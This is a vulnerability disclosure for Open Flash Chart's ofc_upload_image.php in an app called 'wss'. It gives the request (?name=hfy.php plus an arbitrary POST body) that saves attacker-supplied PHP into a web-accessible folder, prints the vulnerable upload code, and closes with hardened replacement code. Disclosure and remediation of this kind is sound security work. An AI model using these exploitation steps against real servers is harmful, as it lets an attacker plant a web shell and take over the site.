POST data to the vulnerable file to save a file with an arbitrary extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php
Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php   (hfy.php is the saved file name)
POST arbitrary data
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is still present in the latest version of wss, even in the paid version; the demo deployed in the Sina app store has it too~
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );
print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is a disaster. How to fix it: add permission checks, extension validation and so on~ handle it yourself.
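The permission and extension checks the fix calls for, as an added example (not Open Flash Chart's own code): a hardened replacement for the raw-POST branch of ofc_upload_image.php. It assumes the application marks logged-in users with $_SESSION['user_id'] (a hypothetical name) and that the standard getimagesizefromstring() function is available.

```php
<?php
// Added example, not Open Flash Chart code: hardened replacement for the
// raw-POST branch of ofc_upload_image.php. Assumes the application sets
// $_SESSION['user_id'] at login (hypothetical name).
session_start();

// 1. Permission check: only authenticated users may save chart images.
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('forbidden');
}

// 2. Never use the client-supplied $_GET['name']. The server picks a random
//    name with a fixed .png extension, so no executable suffix can be chosen.
$default_path = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($default_path)) {
    mkdir($default_path, 0750, true);        // not world-writable like 0777
}
$destination = $default_path . bin2hex(random_bytes(16)) . '.png';

// 3. Read the raw body via php://input ($HTTP_RAW_POST_DATA is gone in PHP 7),
//    capped at 2 MiB so an oversized upload cannot fill the disk.
$max = 2 * 1024 * 1024;
$body = file_get_contents('php://input', false, null, 0, $max + 1);
if ($body === false || $body === '' || strlen($body) > $max) {
    http_response_code(413);
    exit('bad size');
}

// 4. Content validation: the bytes must really be a PNG image, not merely
//    carry a .png name. Check the 8-byte signature, then let PHP parse it.
if (strncmp($body, "\x89PNG\r\n\x1a\n", 8) !== 0) {
    http_response_code(415);
    exit('not a PNG');
}
$info = @getimagesizefromstring($body);
if ($info === false || $info[2] !== IMAGETYPE_PNG) {
    http_response_code(415);
    exit('not a PNG');
}

// 5. Write with restrictive permissions and report only the server-chosen name.
if (file_put_contents($destination, $body, LOCK_EX) === false) {
    http_response_code(500);
    exit('save failed');
}
chmod($destination, 0640);
echo 'Saved as ' . basename($destination);
```

Disabling PHP execution in tmp-upload-images at the web-server level (for example an Apache .htaccess with php_flag engine off) is a second layer; the checks above remove the client's control over the filename and extension, which is what let a POST body be saved as hfy.php.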